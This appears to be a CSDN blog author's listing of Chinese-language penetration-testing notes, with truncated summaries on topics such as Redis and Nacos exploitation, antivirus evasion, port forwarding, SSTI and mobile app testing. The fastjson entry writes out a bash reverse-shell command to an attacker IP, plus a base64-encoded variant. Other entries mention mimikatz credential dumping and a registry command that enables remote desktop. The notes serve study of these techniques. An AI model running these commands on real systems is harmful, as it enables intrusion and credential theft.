小计
文章平均质量分 83
总结我每天学习的知识
Scorpio-m7
这个作者很懒,什么都没留下…
展开
-
linux的shell基本机制
Linuxshell的基本机制原创 2023-04-14 17:10:15 · 172 阅读 · 0 评论 -
php代码审计
php代码审计相关原创 2023-02-10 20:07:32 · 1536 阅读 · 0 评论 -
未授权访问总结
🌕写在前面🍊博客主页:Scorpio_m7,github🎉欢迎关注🔎点赞👍收藏⭐️留言📝🌟本文由 Scorpio_m7原创,CSDN首发!📆首发时间:🌹2022年4月7日🌹✉️坚持和努力一定能换来诗与远方!🙏作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录🌕写在前面Redis未授权访问靶机安装redis利用redis写webshell写入公私钥用私钥登录利用crontab反弹shell防护方法redis主从复制RCE环境搭建漏洞利用漏洞修复Weblogic未授权访.原创 2022-04-07 21:58:39 · 4617 阅读 · 0 评论 -
后渗透流量加密
????写在前面????博客主页:Scorpio_m7,github????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年2月9日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面前言未加密OpenSSLnetcat流量加密Metasploit流量加密OpenSSL创建证书impersonate_ssl模块使用原创 2022-02-14 13:40:09 · 4641 阅读 · 1 评论 -
nacos漏洞复现
????写在前面????博客主页:Scorpio_m7,github????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年2月9日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面概述环境搭建Linuxwindows漏洞复现信息泄露任意用户创建使用Spring Boot获得账号及密码关键信息后台未授权登录概述原创 2022-02-09 19:38:31 · 9654 阅读 · 2 评论 -
近源渗透测试
????写在前面????博客主页:Scorpio_m7????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年1月28日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面wifi渗透Wifi密码爆破WIFI钓鱼无线路由器漏洞利用badusb工具准备安装 arduino 的 IDE驱动安装配置环境CobaltStr原创 2022-01-28 21:20:07 · 3904 阅读 · 0 评论 -
CS免杀上线方式
????写在前面????博客主页:Scorpio_m7????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年1月28日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面WmicmshtaMSBUILDregsvr32POWSHELLRGB隐写上线Wmicwmic是一款Microsoft工具,它提供一个wmi原创 2022-01-28 21:04:34 · 3672 阅读 · 0 评论 -
安卓应用hook测试
安卓应用渗透测试原创 2021-12-29 18:28:11 · 4473 阅读 · 0 评论 -
web安全
web中的常见漏洞注入漏洞SQL注入命令注入代码注入表达式注入XML外部实体注入文件相关本地/远程文件包含任意文件上传任意文件下载/读取信息泄露.svn/.git源代码泄露配置文件、测试文件应用接口暴露备份文件泄露代码托管平台源码泄露业务逻辑安全用户弱口令用户名/密码枚举越权漏洞未授权访问验证码缺陷短信轰炸中间件缺陷jboss反序列化tomcat文件包含weblogic反序列化服务器安全永恒之蓝(MS17-010)操作系统弱口原创 2021-09-03 14:57:45 · 1019 阅读 · 1 评论 -
常规免杀思路
常规免杀思路静态查杀模糊哈希算法又叫基于内容分割的分片分片哈希算法(context triggered piecewise hashing, CTPH),主要用于文件的相似性比较。大致就可以理解为,不要把一个文件的所有内容都拿来计算hash,而通过分片,取出部分重要(不易改变)的内容进行hash计算,这样就能达到通过一个特征码找到类似的病毒变种。手工修改无源码数据方面字符串,如果不影响程序逻辑,可以替换大小写;无关紧要的数据,随意替换;整数,如果不影响结果,替换值,清零等操作。地址,基本原创 2021-11-10 21:04:23 · 423 阅读 · 0 评论 -
内网端口转发
EarthWorm内网穿透正向socks5服务器当目标网络边界存在公网IP且可任意开监听端口./ew_linux_x64 -s ssocksd -l 1080可在该目标机器上开启一个8888的正向连接,然后其他主机可通过SwitchyOmega设置socks5代理为目标主机ip:1080 ,添加这个代理就可以使用了反向socks5服务器服务器(外网vps)./ew_linux_x64 -s rcsocks -l 1080 -e 5555解释:把1080端口收到的请求转发给5555端口。原创 2021-09-26 18:06:33 · 1751 阅读 · 0 评论 -
域渗透总结
域渗透基础原创 2021-12-02 13:54:34 · 3460 阅读 · 0 评论 -
SSTI+python沙箱逃逸
SSTI(Server-Side Template Injection)服务器接受了用户的输入,过滤不严谨,将用户输入作为web应用模板的一部分,但是在通过模板引擎进行渲染的过程中,执行了用户输入的恶意代码,造成命令执行沙箱逃逸在代码执行的环境下,脱离过滤和限制,最终拿到shell权限的过程。模板引擎为了使用户界面与业务数据分离而产生,可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档flask-jinja2flask使用jinja2作为框架的模板系统。jinja2是基于原创 2021-10-02 16:17:49 · 2381 阅读 · 0 评论 -
红队&蓝队&免杀&隐藏文件&横向渗透
1-head请求在蓝队防守前期要关注扫描行为,HEAD请求头只有两行,响应头较短,无请求体和响应体,速度快,多用于探测页面是否存在,例子:HEAD /edit/db/ HTTP/1.1Host:220.181.38.1502-命令开远控在红队队成功连接webshell后,上传mimikatz,通过mimikatz获取当前主机用户名密码,通过以下命令修改注册表远程开启目标windows的3389端口,实现远程连接。REG ADD HKLM\SYSTEM\CurrentControlSet\Con原创 2021-03-27 18:43:19 · 707 阅读 · 3 评论 -
Android安全测试
基础介绍Android 平台、组件等基础知识介绍Android平台架构Android系统 架构采用分层式设计。 如果把Android 系统看做一层一层的,那么基本可以理解成以下结构(这是其中一种简单的分层方式):最上层是应用层( Application 层),包含所有应用 ,比如桌面 (桌面 也是应用)、电话、 设置等,以及我们常用的微信、优酷等应用属于这一层第二层是应用框架层Framework 层),包含了对上层应用的管理和提供开发者所需的应用程序编程接口( API )。第三层是系统运行库层原创 2021-05-17 19:08:02 · 1028 阅读 · 3 评论 -
iOS应用程序安全风险及漏洞解析
基础介绍iOS 系统介绍移动操作系统基于在 XNU 内核, Darwin OSiOS 是闭源操作系统使用 OC 与 Swift 作为开发语言构建在 Cocoa Touch APIiOS 应用沙盒基于 TrustedBSD MAC 强制访问框架第三方应用程序运行在 mobile 用户权限下只有系统应用以 root 用户运行应用程序只能访问自己的文件和数据IPC 通信被限制Jailbreak不完美越狱:设备重启后,之前的越狱状态会失效,需要手动重新越狱完美越狱:越狱后设备重原创 2021-05-18 11:55:31 · 2891 阅读 · 4 评论 -
渗透测试-Z宝典(Penetration-Zbook)
内容大纲:01-攻击流程01-攻击路径02-信息收集-IP资源02-信息收集-域名发现02-信息收集-服务器与人力资源情报收集02-信息收集-网站关键信息收集03-漏洞分析-Web漏洞扫描03-漏洞分析-弱口令扫描03-漏洞分析-漏洞研究03-漏洞分析-系统漏洞扫描04-web渗透测试-CMS漏洞04-web渗透测试-Web TOP 10漏洞04-web渗透测试-框架漏洞04-web渗透测试-绕过Web防火墙05-权限提升-linux提权05-权限提升-Windows系统提权原创 2021-06-29 17:51:26 · 191 阅读 · 0 评论 -
应急响应技能
文章目录01-应急响应基础技能及常见工具使用01-应急响应概述01-应急类型02-应急方法论03-应急响应阶段04-应急排查点/应对方案02-windows应急响应01-系统信息-基本信息02-系统信息-用户信息03-系统信息-启动项04-计划任务05-文件痕迹排查06-进程排查07-日志分析03- Linux应急响应04- 常用工具05-总结01-应急响应基础技能及常见工具使用01-应急响应概述01-应急类型勒索挖矿网站被黑APT攻击非法劫持数据泄露钓鱼邮件02-应急方法论[外原创 2021-06-02 18:32:37 · 2075 阅读 · 1 评论 -
fastjson-复现笔记
vulhub:找到fastjson1.2.47rcedocker-compose up -dnc -lvp 9443attacker反弹shellbash -i >& /dev/tcp/192.168.211.129/9443 0>&1加密bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}最后的ip是apache服原创 2021-08-17 19:13:59 · 226 阅读 · 0 评论 -
Micropoor笔记
windows提权systeminfo>windowsvul.txt&(for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780)do @type windowsvul.txt|@find /i "%i"||@echo %i you can fuck)原创 2021-08-17 18:58:04 · 177 阅读 · 0 评论 -
Linux文件和目录的权限
三级权限存在的问题系统中任一个用户,要么对文件的全部内容具有访问权,要么不可访问文件。有的情况下,很不方便,例如用户修改口令文件/etc/passwd和/etc/shadow策略和机制相分离(SUID权限)文件list.txt的文件主liu给文件query增加SUID权限root@kali:~/#chmod u+s queryroot@kali:~/#ls -l query-rws--x--x 1 liu leader 1234 Dec 10 23:22 query一般情况下,进程的实际UI原创 2021-06-19 23:36:45 · 137 阅读 · 0 评论 -
Linux文件系统
系统调用以c语言函数调用的方式提供操作系统内核提供的编程界面应用程序(ap)和操作系统(kernel)进行交互的唯一手段。例如:文件操作的open,read,write,close系统调用与库函数在执行上有区别库函数在用户态下运行,和可执行文件是一体的,在一个文件中执行。系统调用是调用操作系统里的功能,工作在系统特权状态,使用cpu的INT软中断指令,在操作系统内核完成。例如:获取进程ID的getpid()与字符串拷贝函数strcpy()CPU的INT指令(软中断)与CALL指令(..原创 2021-04-25 12:55:49 · 261 阅读 · 2 评论